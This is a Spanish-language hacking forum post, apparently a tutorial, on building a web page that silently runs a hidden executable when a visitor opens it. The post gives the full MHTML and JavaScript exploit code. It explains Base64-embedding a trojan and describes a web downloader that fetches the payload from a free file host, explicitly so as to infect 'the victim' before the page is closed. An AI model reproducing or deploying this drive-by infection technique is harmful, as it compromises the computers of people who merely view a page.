Bueno, después de mucho intentos fallidos debo aceptar, afÃn pude crear una Pág. q al ser visualizada ejecute un .exe silenciosa mente, aquà dejo la demostración.
No voy a entrar en detalles de cada cosa, lastimosa mente a desaparecido la fuente q me inspiro para este post hace 3 años. Los cuadernos de Hackxcrack .
Primero descarguen este programa Decodificador Base64
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer SesionCon el pueden codificar cualquier archivo a Base64 y otros formatos, al igual q decodificarlos.
Una vez instalados le dan click derecho al archivo o server a codificar, yo usare el .exe de "telnet" ósea "telnet.exe" pero lo renombrare a IGNIZ.exe, luego les aparecerá mas opciones en pantalla.
Luego les parecerá una pantalla, le dan "OK" y en la siguiente pantalla podrán escoger el formato a codificar, nosotros usaremos MimeBase64
Una vez codificado aparecerá un .txt con el nombre del ejecutable codificado, en este caso "IGNIZ.txt"
Al abrir el .txt tenemos un ejecutable en base64.
Ahora lo mas importante, el código q permite toda la idea de este post.
MIME-Version: 1.0
Content-Location:file:///IGNIZ.exe
Content-Transfer-Encoding: base64
«Aqui toda la base64 del ejecutable sustituyendo esto»
[code]<title>IGNIZ</title>
<body bgcolor=black scroll=no>
<script>
function malicialocal()
{
var s=document.URL
var path=unescape(s.substr(-0,s.lastIndexOf("\\")));
var formato= '<body scroll=no bgcolor="black"><FONT face="Arial" color=orange>';
var imagen= '<img src="http://img112.exs.cx/img112/1441/firmalGNIZ2.jpg">';
var texto = '<b> Pag malisiosa =)</b><br>';
var iframe1='<iframe src=http://www.google.com height=300 width=750></iframe>';
var iframe2='<iframe src=file://http://img112.exs.cx/img112/1441/firmalGNIZ2.jpg height=1 width=1></iframe>';
var objetoini='<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:';
var objetofin='\\IGNIZ.html!file:///IGNIZ.exe"></object>';
var bugg = objetoini+path+objetofin
document.write (formato+imagen+texto+iframe1+iframe2+bugg);
}
setTimeout("malicialocal()",200);
</script>
Dejando los espacios respectivos, pegan el código donde indico y cambian los nombres q puse por los de sus archivos.
EJEMPLO:
var objetofin='\\IGNIZ.html!file:///IGNIZ.exe"></object>';
var objetofin='\\hackerss.html!file:///hackerss.exe"></object>';
Una vez terminados los cambios solo guardan la pag, en mi caso IGNIZ.html
Ahora al abrir la Pág. no abra problema alguno y se abrirá normalmente, obviamente esta pagina es de demostración y por lo tanto es algo simple, ustedes pueden diseñar algo mejor.
Segundos después de abierta la pagina, ejecutara el archivo oculto, como yo puse el "telnet.exe" para q fuera visible obviamente se abrirá, siendo un troyano o alguna otra cosa no habra problema y no se vera nada.
Extras:
Si usan ejecutables muy grandes el "block de notas" dirá q no tiene memoria, yo no tuve problemas pues el ejecutable q use solo pesa 76kb,si es mas grande usarÃan el "wordpad" al usarlo nunca les funciona correctamente pues el inserta lÃneas al guardar el archivo, descubrà q eso se soluciona simplemente cambiando el tipo de archivo, trae por defecto "Word para windows 6.0" solo lo cambian a "Documento de texto".
Asà no tendrán problema alguno y funcionara perfectamente, se parece tonto pero por eso estuve un buen rato sin lograr nada....
Ahora q si desean hacer las cosas un poco mejor:
Dependiendo del tamaño del ejecutable eso tardara en infectar a la victima, q pasa si la victima cierra muy rápido la pagina? pues el troyano no logra ejecutarse, q puedo hacer con esto?.
Utilizar un Webdownloader (Imagino q ya saben q es por lo q no entrare en mayor detalle)
Ahora subimos nuestro ejecutable a una pagina web sin comprimir ni codificado, tiene q ser un .exe, q freehosting permite subir ejecutables de esta manera? NINGUNO luego de buscar por un buen tiempo encontré esta pagina q si permitirá subir todos nuestros ejecutables sin siquiera pedirnos registrar. =)
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.savefile.com
Ahora una vez q le damos "examinar" y buscamos nuestro server le damos "Abrir" y luego "Host File" con eso el server será subido a la pagina y se vera asÃ.
La direccion q señale de blanco es la de su archivo, le deben dar click y les mostrara esta pantalla.
Le dan click derecho y luego propiedades donde dice "Download/show the hosted file" para ver la dirección exacta de su ejecutable, esa la copian y la pegan en su Webdownloader asÃ.
Una vez listo crean el ejecutable, y empiezan de nuevo, lo codifican en base64 y lo pegan en la pag, lo mejor es q este ejecutable tan solo pesa 13kb's =) y su ejecución será en milésimas de segundo.
Espero q les sirva este pequeño manual, espero q se entienda pues lo intente escribir de una manera q yo hubiera entendido a la primera.
Tal vez el único inconveniente es encontrar en estos tiempos un hosting gratuito!! q no de problemas q interrumpan la función de la Pág.
creditos :www.hackerss.com
[/code]
Autor